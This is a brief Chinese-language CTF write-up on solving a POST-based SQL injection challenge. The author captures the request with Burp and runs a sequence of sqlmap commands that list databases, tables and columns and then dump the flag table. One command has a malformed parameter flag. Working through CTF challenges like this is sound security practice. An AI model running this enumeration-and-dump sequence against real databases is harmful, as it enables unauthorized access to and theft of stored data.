强烈介意用文件导入来进行注入
用表单注入失败率很高!!
来看这题http://123.206.87.240:8002/chengjidan/index.php
明显是POST注入
利用sqlmap吧,网上都是用手工注入,我就用sqlmap来试试
先用Burp抓包保存为txt文件
如何用sqlmap
sqlmap.py -r "D:/test.txt" -p -id --current-dbs
sqlmap.py -r "d:/test.txt" -p id -D "skctf_flag" --tables
sqlmap.py -r "d:/test.txt" -p id -D "skctf_flag" -T "fl4g" --columns
sqlmap.py -r "d:/test.txt" -p id -D "skctf_flag" -T "fl4g" -C "skctf_flag" --dump